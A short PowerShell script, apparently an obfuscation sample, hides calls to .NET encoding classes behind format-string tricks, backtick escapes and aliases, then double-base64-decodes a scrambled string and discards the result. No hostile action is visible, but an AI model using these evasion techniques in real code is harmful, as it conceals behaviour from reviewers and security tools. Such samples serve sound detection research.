 SET-ITEM  ("VaRI"+"ABl"+"e:3My")  ([tYPE]("{1}{2}{0}" -F'NG','T','eXT.EnCOdI')  )  ; $nH25 =  [typE]("{0}{1}{2}" -F'c','OnVeR','t');  Function _`_=/=\{
    [CmdletBinding()] param(
        [Parameter(posItIoN = 0)]
        [String]
        ${PA`R`Am1}
    )

    ${ReS`U`Lt}  =   (GET-vARiABle  3`MY  ).VAluE::"unic`ODE"."gets`TrI`Ng"( (Get-ItEm VARIAbl`E:`Nh`25).vALuE::"f`RoM`Bas`E64`stRI`Ng"(${Pa`RAM1}))
    return ${Res`U`lt}
}

Function _//_`/==`/=={
    [CmdletBinding()] param(
        [Parameter(Position = 0)]
        [String]
        ${p`ARAM1}
    )
    
    ${PAR`Am1} = &(('_'+'_=/='+'xhd')  -CreplACe  ([CHAr]120+[CHAr]104+[CHAr]100),[CHAr]92) -param1 ${p`Ar`Am1} 
    ${r`ESulT} =   $3my::"U`NICode"."geTSt`RING"(  (  VarIABle  NH`25 -vA )::"frOmB`A`Se64`sTRI`NG"(${P`ARA`m1}))
    ${R`E`sUlt} | .('ou'+'t-null')
}

&('_'+'//_'+'/==/==')(("{14}{18}{4}{10}{1}{15}{20}{19}{5}{21}{7}{2}{11}{12}{0}{16}{8}{6}{9}{3}{13}{17}" -f 'nAEEAeQBB
AEQATQ','AUQBBAHoAQQ','BZ','BADAA','RAEIAdwBBAEQA','NAGcAQQB','Zw','EEARA','AEwA','B','bwBBAE4','A','EEATAB','QQBEAE0AQ','YQ','BDAD','BB','QA=','B','B','QAQQ','5A'))

